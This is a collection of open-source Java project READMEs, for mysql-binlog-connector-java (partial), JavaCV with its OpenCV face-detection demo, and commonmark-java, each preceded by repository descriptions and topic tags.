CHARACTER_SET_NAME, COLLATION_NAME from INFORMATION_SCHEMA.COLUMNS; # see https://dev.mysql.com/doc/refman/5.6/en/columns-table.html for more information ``` (yes, binary log DOES NOT include that piece of information). You can find JDBC snippet [here](https://github.com/shyiko/mysql-binlog-connector-java/issues/24#issuecomment-43747417). ## Documentation #### API overview There are two entry points - [BinaryLogClient](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/BinaryLogClient.java) (which you can use to read binary logs from a MySQL server) and [BinaryLogFileReader](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/BinaryLogFileReader.java) (for offline log processing). Both of them rely on [EventDeserializer](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/deserialization/EventDeserializer.java) to deserialize stream of events. Each [Event](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/Event.java) consists of [EventHeader](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/EventHeader.java) (containing among other things reference to [EventType](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/EventType.java)) and [EventData](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/EventData.java). The aforementioned EventDeserializer has one [EventHeaderDeserializer](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/deserialization/EventHeaderDeserializer.java) ([EventHeaderV4Deserializer](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/deserialization/EventHeaderV4Deserializer.java) by default) and [a collection of EventDataDeserializer|s](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/deserialization/EventDeserializer.java#L82). If there is no EventDataDeserializer registered for some particular type of Event - default EventDataDeserializer kicks in ([NullEventDataDeserializer](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/deserialization/NullEventDataDeserializer.java)). #### MySQL Internals Manual For the insight into the internals of MySQL look [here](https://dev.mysql.com/doc/internals/en/index.html). [MySQL Client/Server Protocol](http://dev.mysql.com/doc/internals/en/client-server-protocol.html) and [The Binary Log](http://dev.mysql.com/doc/internals/en/binary-log.html) sections are particularly useful as a reference documentation for the `**.binlog.network` and `**.binlog.event` packages. ## Real-world applications Some of the OSS using / built on top of mysql-binlog-conector-java: * [apache/nifi](https://github.com/apache/nifi) An easy to use, powerful, and reliable system to process and distribute data. * [debezium](https://github.com/debezium/debezium) A low latency data streaming platform for change data capture (CDC). * [mavenlink/changestream](https://github.com/mavenlink/changestream) - A stream of changes for MySQL built on Akka. * [mardambey/mypipe](https://github.com/mardambey/mypipe) MySQL binary log consumer with the ability to act on changed rows and publish changes to different systems with emphasis on Apache Kafka. * [ngocdaothanh/mydit](https://github.com/ngocdaothanh/mydit) MySQL to MongoDB data replicator. * [sharetribe/dumpr](https://github.com/sharetribe/dumpr) A Clojure library for live replicating data from a MySQL database. * [shyiko/rook](https://github.com/shyiko/rook) Generic Change Data Capture (CDC) toolkit. * [streamsets/datacollector](https://github.com/streamsets/datacollector) Continuous big data ingestion infrastructure. * [twingly/ecco](https://github.com/twingly/ecco) MySQL replication binlog parser in JRuby. * [zendesk/maxwell](https://github.com/zendesk/maxwell) A MySQL-to-JSON Kafka producer. * [zzt93/syncer](https://github.com/zzt93/syncer) A tool sync & manipulate data from MySQL/MongoDB to ES/Kafka/MySQL, which make 'Eventual Consistency' promise. It's also used [on a large scale](https://twitter.com/atwinmutt/status/626816601078300672) in MailChimp. You can read about it [here](http://devs.mailchimp.com/blog/powering-mailchimp-pro-reporting/). ## Development ```sh git clone https://github.com/shyiko/mysql-binlog-connector-java.git cd mysql-binlog-connector-java mvn # shows how to build, test, etc. project ``` ## Contributing In lieu of a formal styleguide, please take care to maintain the existing coding style. Executing `mvn checkstyle:check` within project directory should not produce any errors. If you are willing to install [vagrant](http://www.vagrantup.com/) (required by integration tests) it's highly recommended to check (with `mvn clean verify`) that there are no test failures before sending a pull request. Additional tests for any new or changed functionality are also very welcomed. ## License [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0)
Yahoo! Cloud Serving Benchmark
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Java interface to OpenCV, FFmpeg, and more
computer-vision ffmpeg java javacv maven multimedia opencv opencv-java
JavaCV ====== [![Gitter](https://badges.gitter.im/bytedeco/javacv.svg)](https://gitter.im/bytedeco/javacv) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.bytedeco/javacv-platform/badge.svg)](https://maven-badges.herokuapp.com/maven-central/org.bytedeco/javacv-platform) [![Sonatype Nexus (Snapshots)](https://img.shields.io/nexus/s/https/oss.sonatype.org/org.bytedeco/javacv.svg)](http://bytedeco.org/builds/) [![Build Status](https://travis-ci.org/bytedeco/javacv.svg?branch=master)](https://travis-ci.org/bytedeco/javacv) <sup>Commercial support:</sup> [![xscode](https://img.shields.io/badge/Available%20on-xs%3Acode-blue?style=?style=plastic&logo=appveyor&logo=)](https://xscode.com/bytedeco/javacv) Introduction ------------ JavaCV uses wrappers from the [JavaCPP Presets](https://github.com/bytedeco/javacpp-presets) of commonly used libraries by researchers in the field of computer vision ([OpenCV](http://opencv.org/), [FFmpeg](http://ffmpeg.org/), [libdc1394](http://damien.douxchamps.net/ieee1394/libdc1394/), [FlyCapture](https://www.flir.com/products/flycapture-sdk/), [Spinnaker](https://www.flir.com/products/spinnaker-sdk/), [OpenKinect](http://openkinect.org/), [librealsense](https://github.com/IntelRealSense/librealsense), [CL PS3 Eye Driver](https://codelaboratories.com/downloads/), [videoInput](http://muonics.net/school/spring05/videoInput/), [ARToolKitPlus](https://launchpad.net/artoolkitplus), [flandmark](https://github.com/uricamic/flandmark), [Leptonica](http://www.leptonica.org/), and [Tesseract](https://github.com/tesseract-ocr/tesseract)) and provides utility classes to make their functionality easier to use on the Java platform, including Android. JavaCV also comes with hardware accelerated full-screen image display (`CanvasFrame` and `GLCanvasFrame`), easy-to-use methods to execute code in parallel on multiple cores (`Parallel`), user-friendly geometric and color calibration of cameras and projectors (`GeometricCalibrator`, `ProCamGeometricCalibrator`, `ProCamColorCalibrator`), detection and matching of feature points (`ObjectFinder`), a set of classes that implement direct image alignment of projector-camera systems (mainly `GNImageAligner`, `ProjectiveTransformer`, `ProjectiveColorTransformer`, `ProCamTransformer`, and `ReflectanceInitializer`), a blob analysis package (`Blobs`), as well as miscellaneous functionality in the `JavaCV` class. Some of these classes also have an OpenCL and OpenGL counterpart, their names ending with `CL` or starting with `GL`, i.e.: `JavaCVCL`, `GLCanvasFrame`, etc. To learn how to use the API, since documentation currently lacks, please refer to the [Sample Usage](#sample-usage) section below as well as the [sample programs](https://github.com/bytedeco/javacv/tree/master/samples/), including two for Android (`FacePreview.java` and `RecordActivity.java`), also found in the `samples` directory. You may also find it useful to refer to the source code of [ProCamCalib](https://github.com/bytedeco/procamcalib) and [ProCamTracker](https://github.com/bytedeco/procamtracker) as well as [examples ported from OpenCV2 Cookbook](https://github.com/bytedeco/javacv-examples/) and the associated [wiki pages](https://github.com/bytedeco/javacv-examples/tree/master/OpenCV_Cookbook). Please keep me informed of any updates or fixes you make to the code so that I may integrate them into the next release. Thank you! And feel free to ask questions on [the mailing list](http://groups.google.com/group/javacv) or [the discussion forum](https://github.com/bytedeco/javacv/discussions) if you encounter any problems with the software! I am sure it is far from perfect... Downloads --------- Archives containing JAR files are available as [releases](https://github.com/bytedeco/javacv/releases). The binary archive contains builds for Android, iOS, Linux, Mac OS X, and Windows. The JAR files for specific child modules or platforms can also be obtained individually from the [Maven Central Repository](http://search.maven.org/#search|ga|1|bytedeco). To install manually the JAR files, follow the instructions in the [Manual Installation](#manual-installation) section below. We can also have everything downloaded and installed automatically with: * Maven (inside the `pom.xml` file) ```xml <dependency> <groupId>org.bytedeco</groupId> <artifactId>javacv-platform</artifactId> <version>1.5.10</version> </dependency> ``` * Gradle (inside the `build.gradle.kts` or `build.gradle` file) ```groovy dependencies { implementation("org.bytedeco:javacv-platform:1.5.10") } ``` * Leiningen (inside the `project.clj` file) ```clojure :dependencies [ [org.bytedeco/javacv-platform "1.5.10"] ] ``` * sbt (inside the `build.sbt` file) ```scala libraryDependencies += "org.bytedeco" % "javacv-platform" % "1.5.10" ``` This downloads binaries for all platforms, but to get binaries for only one platform we can set the `javacpp.platform` system property (via the `-D` command line option) to something like `android-arm`, `linux-x86_64`, `macosx-x86_64`, `windows-x86_64`, etc. Please refer to the [README.md file of the JavaCPP Presets](https://github.com/bytedeco/javacpp-presets#downloads) for details. Another option available to Gradle users is [Gradle JavaCPP](https://github.com/bytedeco/gradle-javacpp), and similarly for Scala users there is [SBT-JavaCV](https://github.com/bytedeco/sbt-javacv). Required Software ----------------- To use JavaCV, you will first need to download and install the following software: * An implementation of Java SE 7 or newer: * OpenJDK http://openjdk.java.net/install/ or * Oracle JDK http://www.oracle.com/technetwork/java/javase/downloads/ or * IBM JDK http://www.ibm.com/developerworks/java/jdk/ Further, although not always required, some functionality of JavaCV also relies on: * CL Eye Platform SDK (Windows only) http://codelaboratories.com/downloads/ * Android SDK API 21 or newer http://developer.android.com/sdk/ * JOCL and JOGL from JogAmp http://jogamp.org/ Finally, please make sure everything has the same bitness: **32-bit and 64-bit modules do not mix under any circumstances**. Manual Installation ------------------- Simply put all the desired JAR files (`opencv*.jar`, `ffmpeg*.jar`, etc.), in addition to `javacpp.jar` and `javacv.jar`, somewhere in your class path. Here are some more specific instructions for common cases: NetBeans (Java SE 7 or newer): 1. In the Projects window, right-click the Libraries node of your project, and select "Add JAR/Folder...". 2. Locate the JAR files, select them, and click OK. Eclipse (Java SE 7 or newer): 1. Navigate to Project > Properties > Java Build Path > Libraries and click "Add External JARs...". 2. Locate the JAR files, select them, and click OK. Visual Studio Code (Java SE 7 or newer): 1. Navigate to Java Projects > Referenced Libraries, and click `+`. 2. Locate the JAR files, select them, and click OK. IntelliJ IDEA (Android 7.0 or newer): 1. Follow the instructions on this page: http://developer.android.com/training/basics/firstapp/ 2. Copy all the JAR files into the `app/libs` subdirectory. 3. Navigate to File > Project Structure > app > Dependencies, click `+`, and select "2 File dependency". 4. Select all the JAR files from the `libs` subdirectory. After that, the wrapper classes for OpenCV and FFmpeg, for example, can automatically access all of their C/C++ APIs: * [OpenCV documentation](http://docs.opencv.org/master/) * [FFmpeg documentation](http://ffmpeg.org/doxygen/trunk/) Sample Usage ------------ The class definitions are basically ports to Java of the original header files in C/C++, and I deliberately decided to keep as much of the original syntax as possible. For example, here is a method that tries to load an image file, smooth it, and save it back to disk: ```java import org.bytedeco.opencv.opencv_core.*; import org.bytedeco.opencv.opencv_imgproc.*; import static org.bytedeco.opencv.global.opencv_core.*; import static org.bytedeco.opencv.global.opencv_imgproc.*; import static org.bytedeco.opencv.global.opencv_imgcodecs.*; public class Smoother { public static void smooth(String filename) { Mat image = imread(filename); if (image != null) { GaussianBlur(image, image, new Size(3, 3), 0); imwrite(filename, image); } } } ``` JavaCV also comes with helper classes and methods on top of OpenCV and FFmpeg to facilitate their integration to the Java platform. Here is a small demo program demonstrating the most frequently useful parts: ```java import java.io.File; import java.net.URL; import org.bytedeco.javacv.*; import org.bytedeco.javacpp.*; import org.bytedeco.javacpp.indexer.*; import org.bytedeco.opencv.opencv_core.*; import org.bytedeco.opencv.opencv_imgproc.*; import org.bytedeco.opencv.opencv_calib3d.*; import org.bytedeco.opencv.opencv_objdetect.*; import static org.bytedeco.opencv.global.opencv_core.*; import static org.bytedeco.opencv.global.opencv_imgproc.*; import static org.bytedeco.opencv.global.opencv_calib3d.*; import static org.bytedeco.opencv.global.opencv_objdetect.*; public class Demo { public static void main(String[] args) throws Exception { String classifierName = null; if (args.length > 0) { classifierName = args[0]; } else { URL url = new URL("https://raw.github.com/opencv/opencv/master/data/haarcascades/haarcascade_frontalface_alt.xml"); File file = Loader.cacheResource(url); classifierName = file.getAbsolutePath(); } // We can "cast" Pointer objects by instantiating a new object of the desired class. CascadeClassifier classifier = new CascadeClassifier(classifierName); if (classifier == null) { System.err.println("Error loading classifier file \"" + classifierName + "\"."); System.exit(1); } // The available FrameGrabber classes include OpenCVFrameGrabber (opencv_videoio), // DC1394FrameGrabber, FlyCapture2FrameGrabber, OpenKinectFrameGrabber, OpenKinect2FrameGrabber, // RealSenseFrameGrabber, RealSense2FrameGrabber, PS3EyeFrameGrabber, VideoInputFrameGrabber, and FFmpegFrameGrabber. FrameGrabber grabber = FrameGrabber.createDefault(0); grabber.start(); // CanvasFrame, FrameGrabber, and FrameRecorder use Frame objects to communicate image data. // We need a FrameConverter to interface with other APIs (Android, Java 2D, JavaFX, Tesseract, OpenCV, etc). OpenCVFrameConverter.ToMat converter = new OpenCVFrameConverter.ToMat(); // FAQ about IplImage and Mat objects from OpenCV: // - For custom raw processing of data, createBuffer() returns an NIO direct // buffer wrapped around the memory pointed by imageData, and under Android we can // also use that Buffer with Bitmap.copyPixelsFromBuffer() and copyPixelsToBuffer(). // - To get a BufferedImage from an IplImage, or vice versa, we can chain calls to // Java2DFrameConverter and OpenCVFrameConverter, one after the other. // - Java2DFrameConverter also has static copy() methods that we can use to transfer // data more directly between BufferedImage and IplImage or Mat via Frame objects. Mat grabbedImage = converter.convert(grabber.grab()); int height = grabbedImage.rows(); int width = grabbedImage.cols(); // Objects allocated with `new`, clone(), or a create*() factory method are automatically released // by the garbage collector, but may still be explicitly released by calling deallocate(). // You shall NOT call cvReleaseImage(), cvReleaseMemStorage(), etc. on objects allocated this way. Mat grayImage = new Mat(height, width, CV_8UC1); Mat rotatedImage = grabbedImage.clone(); // The OpenCVFrameRecorder class simply uses the VideoWriter of opencv_videoio, // but FFmpegFrameRecorder also exists as a more versatile alternative. FrameRecorder recorder = FrameRecorder.createDefault("output.avi", width, height); recorder.start(); // CanvasFrame is a JFrame containing a Canvas component, which is hardware accelerated. // It can also switch into full-screen mode when called with a screenNumber. // We should also specify the relative monitor/camera response for proper gamma correction. CanvasFrame frame = new CanvasFrame("Some Title", CanvasFrame.getDefaultGamma()/grabber.getGamma()); // Let's create some random 3D rotation... Mat randomR = new Mat(3, 3, CV_64FC1), randomAxis = new Mat(3, 1, CV_64FC1); // We can easily and efficiently access the elements of matrices and images // through an Indexer object with the set of get() and put() methods. DoubleIndexer Ridx = randomR.createIndexer(), axisIdx = randomAxis.createIndexer(); axisIdx.put(0, (Math.random() - 0.5) / 4, (Math.random() - 0.5) / 4, (Math.random() - 0.5) / 4); Rodrigues(randomAxis, randomR); double f = (width + height) / 2.0; Ridx.put(0, 2, Ridx.get(0, 2) * f); Ridx.put(1, 2, Ridx.get(1, 2) * f); Ridx.put(2, 0, Ridx.get(2, 0) / f); Ridx.put(2, 1, Ridx.get(2, 1) / f); System.out.println(Ridx); // We can allocate native arrays using constructors taking an integer as argument. Point hatPoints = new Point(3); while (frame.isVisible() && (grabbedImage = converter.convert(grabber.grab())) != null) { // Let's try to detect some faces! but we need a grayscale image... cvtColor(grabbedImage, grayImage, CV_BGR2GRAY); RectVector faces = new RectVector(); classifier.detectMultiScale(grayImage, faces); long total = faces.size(); for (long i = 0; i < total; i++) { Rect r = faces.get(i); int x = r.x(), y = r.y(), w = r.width(), h = r.height(); rectangle(grabbedImage, new Point(x, y), new Point(x + w, y + h), Scalar.RED, 1, CV_AA, 0); // To access or pass as argument the elements of a native array, call position() before. hatPoints.position(0).x(x - w / 10 ).y(y - h / 10); hatPoints.position(1).x(x + w * 11 / 10).y(y - h / 10); hatPoints.position(2).x(x + w / 2 ).y(y - h / 2 ); fillConvexPoly(grabbedImage, hatPoints.position(0), 3, Scalar.GREEN, CV_AA, 0); } // Let's find some contours! but first some thresholding... threshold(grayImage, grayImage, 64, 255, CV_THRESH_BINARY); // To check if an output argument is null we may call either isNull() or equals(null). MatVector contours = new MatVector(); findContours(grayImage, contours, CV_RETR_LIST, CV_CHAIN_APPROX_SIMPLE); long n = contours.size(); for (long i = 0; i < n; i++) { Mat contour = contours.get(i); Mat points = new Mat(); approxPolyDP(contour, points, arcLength(contour, true) * 0.02, true); drawContours(grabbedImage, new MatVector(points), -1, Scalar.BLUE); } warpPerspective(grabbedImage, rotatedImage, randomR, rotatedImage.size()); Frame rotatedFrame = converter.convert(rotatedImage); frame.showImage(rotatedFrame); recorder.record(rotatedFrame); } frame.dispose(); recorder.stop(); grabber.stop(); } } ``` Furthermore, after creating a `pom.xml` file with the following content: ```xml <project> <modelVersion>4.0.0</modelVersion> <groupId>org.bytedeco.javacv</groupId> <artifactId>demo</artifactId> <version>1.5.10</version> <properties> <maven.compiler.source>1.7</maven.compiler.source> <maven.compiler.target>1.7</maven.compiler.target> </properties> <dependencies> <dependency> <groupId>org.bytedeco</groupId> <artifactId>javacv-platform</artifactId> <version>1.5.10</version> </dependency> <!-- Additional dependencies required to use CUDA and cuDNN --> <dependency> <groupId>org.bytedeco</groupId> <artifactId>opencv-platform-gpu</artifactId> <version>4.9.0-1.5.10</version> </dependency> <!-- Optional GPL builds with (almost) everything enabled --> <dependency> <groupId>org.bytedeco</groupId> <artifactId>ffmpeg-platform-gpl</artifactId> <version>6.1.1-1.5.10</version> </dependency> </dependencies> <build> <sourceDirectory>.</sourceDirectory> </build> </project> ``` And by placing the source code above in `Demo.java`, or similarly for other classes found in the [`samples`](samples), we can use the following command to have everything first installed automatically and then executed by Maven: ```bash $ mvn compile exec:java -Dexec.mainClass=Demo ``` **Note**: In case of errors, please make sure that the `artifactId` in the `pom.xml` file reads `javacv-platform`, not `javacv` only, for example. The artifact `javacv-platform` adds all the necessary binary dependencies. Build Instructions ------------------ If the binary files available above are not enough for your needs, you might need to rebuild them from the source code. To this end, the project files were created for: * Maven 3.x http://maven.apache.org/download.html * JavaCPP 1.5.10 https://github.com/bytedeco/javacpp * JavaCPP Presets 1.5.10 https://github.com/bytedeco/javacpp-presets Once installed, simply call the usual `mvn install` command for JavaCPP, its Presets, and JavaCV. By default, no other dependencies than a C++ compiler for JavaCPP are required. Please refer to the comments inside the `pom.xml` files for further details. Instead of building the native libraries manually, we can run `mvn install` for JavaCV only and rely on the snapshot artifacts from the CI builds: * http://bytedeco.org/builds/ ---- Project lead: Samuel Audet [samuel.audet `at` gmail.com](mailto:samuel.audet&nbsp;at&nbsp;gmail.com) Developer site: https://github.com/bytedeco/javacv Discussion group: http://groups.google.com/group/javacv
Java library for parsing and rendering CommonMark (Markdown)
commonmark java library markdown parser renderer
commonmark-java =============== Java library for parsing and rendering [Markdown] text according to the [CommonMark] specification (and some extensions). [![Maven Central status](https://img.shields.io/maven-central/v/org.commonmark/commonmark.svg)](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.commonmark%22) [![javadoc](https://www.javadoc.io/badge/org.commonmark/commonmark.svg?color=blue)](https://www.javadoc.io/doc/org.commonmark/commonmark) [![ci](https://github.com/commonmark/commonmark-java/workflows/ci/badge.svg)](https://github.com/commonmark/commonmark-java/actions?query=workflow%3Aci) [![codecov](https://codecov.io/gh/commonmark/commonmark-java/branch/main/graph/badge.svg)](https://codecov.io/gh/commonmark/commonmark-java) [![SourceSpy Dashboard](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/commonmarkcommonmarkjava/) Introduction ------------ Provides classes for parsing input to an abstract syntax tree (AST), visiting and manipulating nodes, and rendering to HTML or back to Markdown. It started out as a port of [commonmark.js], but has since evolved into an extensible library with the following features: * Small (core has no dependencies, extensions in separate artifacts) * Fast (10-20 times faster than [pegdown] which used to be a popular Markdown library, see benchmarks in repo) * Flexible (manipulate the AST after parsing, customize HTML rendering) * Extensible (tables, strikethrough, autolinking and more, see below) The library is supported on Java 11 and later. It works on Android too, but that is on a best-effort basis, please report problems. For Android the minimum API level is 19, see the [commonmark-android-test](commonmark-android-test) directory. Coordinates for core library (see all on [Maven Central]): ```xml <dependency> <groupId>org.commonmark</groupId> <artifactId>commonmark</artifactId> <version>0.21.0</version> </dependency> ``` The module names to use in Java 9 are `org.commonmark`, `org.commonmark.ext.autolink`, etc, corresponding to package names. Note that for 0.x releases of this library, the API is not considered stable yet and may break between minor releases. After 1.0, [Semantic Versioning] will be followed. A package containing `beta` means it's not subject to stable API guarantees yet; but for normal usage it should not be necessary to use. See the [spec.txt](commonmark-test-util/src/main/resources/spec.txt) file if you're wondering which version of the spec is currently implemented. Also check out the [CommonMark dingus] for getting familiar with the syntax or trying out edge cases. If you clone the repository, you can also use the `DingusApp` class to try out things interactively. Usage ----- #### Parse and render to HTML ```java import org.commonmark.node.*; import org.commonmark.parser.Parser; import org.commonmark.renderer.html.HtmlRenderer; Parser parser = Parser.builder().build(); Node document = parser.parse("This is *Markdown*"); HtmlRenderer renderer = HtmlRenderer.builder().build(); renderer.render(document); // "<p>This is <em>Markdown</em></p>\n" ``` This uses the parser and renderer with default options. Both builders have methods for configuring their behavior: * `escapeHtml(true)` on `HtmlRenderer` will escape raw HTML tags and blocks. * `sanitizeUrls(true)` on `HtmlRenderer` will strip potentially unsafe URLs from `<a>` and `<img>` tags * For all available options, see methods on the builders. Note that this library doesn't try to sanitize the resulting HTML with regards to which tags are allowed, etc. That is the responsibility of the caller, and if you expose the resulting HTML, you probably want to run a sanitizer on it after this. #### Render to Markdown ```java import org.commonmark.node.*; import org.commonmark.renderer.markdown.MarkdownRenderer; MarkdownRenderer renderer = MarkdownRenderer.builder().build(); Node document = new Document(); Heading heading = new Heading(); heading.setLevel(2); heading.appendChild(new Text("My title")); document.appendChild(heading); renderer.render(document); // "## My title\n" ``` For rendering to plain text with minimal markup, there's also `TextContentRenderer`. #### Use a visitor to process parsed nodes After the source text has been parsed, the result is a tree of nodes. That tree can be modified before rendering, or just inspected without rendering: ```java Node node = parser.parse("Example\n=======\n\nSome more text"); WordCountVisitor visitor = new WordCountVisitor(); node.accept(visitor); visitor.wordCount; // 4 class WordCountVisitor extends AbstractVisitor { int wordCount = 0; @Override public void visit(Text text) { // This is called for all Text nodes. Override other visit methods for other node types. // Count words (this is just an example, don't actually do it this way for various reasons). wordCount += text.getLiteral().split("\\W+").length; // Descend into children (could be omitted in this case because Text nodes don't have children). visitChildren(text); } } ``` #### Add or change attributes of HTML elements Sometimes you might want to customize how HTML is rendered. If all you want to do is add or change attributes on some elements, there's a simple way to do that. In this example, we register a factory for an `AttributeProvider` on the renderer to set a `class="border"` attribute on `img` elements. ```java Parser parser = Parser.builder().build(); HtmlRenderer renderer = HtmlRenderer.builder() .attributeProviderFactory(new AttributeProviderFactory() { public AttributeProvider create(AttributeProviderContext context) { return new ImageAttributeProvider(); } }) .build(); Node document = parser.parse("![text](/url.png)"); renderer.render(document); // "<p><img src=\"/url.png\" alt=\"text\" class=\"border\" /></p>\n" class ImageAttributeProvider implements AttributeProvider { @Override public void setAttributes(Node node, String tagName, Map<String, String> attributes) { if (node instanceof Image) { attributes.put("class", "border"); } } } ``` #### Customize HTML rendering If you want to do more than just change attributes, there's also a way to take complete control over how HTML is rendered. In this example, we're changing the rendering of indented code blocks to only wrap them in `pre` instead of `pre` and `code`: ```java Parser parser = Parser.builder().build(); HtmlRenderer renderer = HtmlRenderer.builder() .nodeRendererFactory(new HtmlNodeRendererFactory() { public NodeRenderer create(HtmlNodeRendererContext context) { return new IndentedCodeBlockNodeRenderer(context); } }) .build(); Node document = parser.parse("Example:\n\n code"); renderer.render(document); // "<p>Example:</p>\n<pre>code\n</pre>\n" class IndentedCodeBlockNodeRenderer implements NodeRenderer { private final HtmlWriter html; IndentedCodeBlockNodeRenderer(HtmlNodeRendererContext context) { this.html = context.getWriter(); } @Override public Set<Class<? extends Node>> getNodeTypes() { // Return the node types we want to use this renderer for. return Collections.<Class<? extends Node>>singleton(IndentedCodeBlock.class); } @Override public void render(Node node) { // We only handle one type as per getNodeTypes, so we can just cast it here. IndentedCodeBlock codeBlock = (IndentedCodeBlock) node; html.line(); html.tag("pre"); html.text(codeBlock.getLiteral()); html.tag("/pre"); html.line(); } } ``` #### Add your own node types In case you want to store additional data in the document or have custom elements in the resulting HTML, you can create your own subclass of `CustomNode` and add instances as child nodes to existing nodes. To define the HTML rendering for them, you can use a `NodeRenderer` as explained above. #### Thread-safety Both the `Parser` and `HtmlRenderer` are designed so that you can configure them once using the builders and then use them multiple times/from multiple threads. This is done by separating the state for parsing/rendering from the configuration. Having said that, there might be bugs of course. If you find one, please report an issue. ### API documentation Javadocs are available online on [javadoc.io](https://www.javadoc.io/doc/org.commonmark/commonmark). Extensions ---------- Extensions need to extend the parser, or the HTML renderer, or both. To use an extension, the builder objects can be configured with a list of extensions. Because extensions are optional, they live in separate artifacts, so additional dependencies need to be added as well. Let's look at how to enable tables from GitHub Flavored Markdown. First, add an additional dependency (see [Maven Central] for others): ```xml <dependency> <groupId>org.commonmark</groupId> <artifactId>commonmark-ext-gfm-tables</artifactId> <version>0.21.0</version> </dependency> ``` Then, configure the extension on the builders: ```java import org.commonmark.ext.gfm.tables.TablesExtension; List<Extension> extensions = Arrays.asList(TablesExtension.create()); Parser parser = Parser.builder() .extensions(extensions) .build(); HtmlRenderer renderer = HtmlRenderer.builder() .extensions(extensions) .build(); ``` To configure another extension in the above example, just add it to the list. The following extensions are developed with this library, each in their own artifact. ### Autolink Turns plain links such as URLs and email addresses into links (based on [autolink-java]). Use class `AutolinkExtension` from artifact `commonmark-ext-autolink`. ### Strikethrough Enables strikethrough of text by enclosing it in `~~`. For example, in `hey ~~you~~`, `you` will be rendered as strikethrough text. Use class `StrikethroughExtension` in artifact `commonmark-ext-gfm-strikethrough`. ### Tables Enables tables using pipes as in [GitHub Flavored Markdown][gfm-tables]. Use class `TablesExtension` in artifact `commonmark-ext-gfm-tables`. ### Heading anchor Enables adding auto generated "id" attributes to heading tags. The "id" is based on the text of the heading. `# Heading` will be rendered as: ``` <h1 id="heading">Heading</h1> ``` Use class `HeadingAnchorExtension` in artifact `commonmark-ext-heading-anchor`. In case you want custom rendering of the heading instead, you can use the `IdGenerator` class directly together with a `HtmlNodeRendererFactory` (see example above). ### Ins Enables underlining of text by enclosing it in `++`. For example, in `hey ++you++`, `you` will be rendered as underline text. Uses the &lt;ins&gt; tag. Use class `InsExtension` in artifact `commonmark-ext-ins`. ### YAML front matter Adds support for metadata through a YAML front matter block. This extension only supports a subset of YAML syntax. Here's an example of what's supported: ``` --- key: value list: - value 1 - value 2 literal: | this is literal value. literal values 2 --- document start here ``` Use class `YamlFrontMatterExtension` in artifact `commonmark-ext-yaml-front-matter`. To fetch metadata, use `YamlFrontMatterVisitor`. ### Image Attributes Adds support for specifying attributes (specifically height and width) for images. The attribute elements are given as `key=value` pairs inside curly braces `{ }` after the image node to which they apply, for example: ``` ![text](/url.png){width=640 height=480} ``` will be rendered as: ``` <img src="/url.png" alt="text" width="640" height="480" /> ``` Use class `ImageAttributesExtension` in artifact `commonmark-ext-image-attributes`. Note: since this extension uses curly braces `{` `}` as its delimiters (in `StylesDelimiterProcessor`), this means that other delimiter processors *cannot* use curly braces for delimiting. ### Task List Items Adds support for tasks as list items. A task can be represented as a list item where the first non-whitespace character is a left bracket `[`, then a single whitespace character or the letter `x` in lowercase or uppercase, then a right bracket `]` followed by at least one whitespace before any other content. For example: ``` - [ ] task #1 - [x] task #2 ``` will be rendered as: ``` <ul> <li><input type="checkbox" disabled=""> task #1</li> <li><input type="checkbox" disabled="" checked=""> task #2</li> </ul> ``` Use class `TaskListItemsExtension` in artifact `commonmark-ext-task-list-items`. ### Third-party extensions You can also find other extensions in the wild: * [commonmark-ext-notifications](https://github.com/McFoggy/commonmark-ext-notifications): this extension allows to easily create notifications/admonitions paragraphs like `INFO`, `SUCCESS`, `WARNING` or `ERROR` See also -------- * [Markwon](https://github.com/noties/Markwon): Android library for rendering markdown as system-native Spannables * [flexmark-java](https://github.com/vsch/flexmark-java): Fork that added support for a lot more syntax and flexibility Contributing ------------ See [CONTRIBUTING.md](CONTRIBUTING.md) file. License ------- Copyright (c) Atlassian and others. BSD (2-clause) licensed, see LICENSE.txt file. [CommonMark]: https://commonmark.org/ [Markdown]: https://daringfireball.net/projects/markdown/ [commonmark.js]: https://github.com/commonmark/commonmark.js [pegdown]: https://github.com/sirthias/pegdown [CommonMark Dingus]: https://spec.commonmark.org/dingus/ [Maven Central]: https://search.maven.org/#search|ga|1|g%3A%22org.commonmark%22 [Semantic Versioning]: https://semver.org/ [autolink-java]: https://github.com/robinst/autolink-java [gfm-tables]: https://help.github.com/articles/organizing-information-with-tables/
Java Solutions to problems on LintCode/LeetCode
algorithm dynamicprogramming java java-solution leetcode lintcode
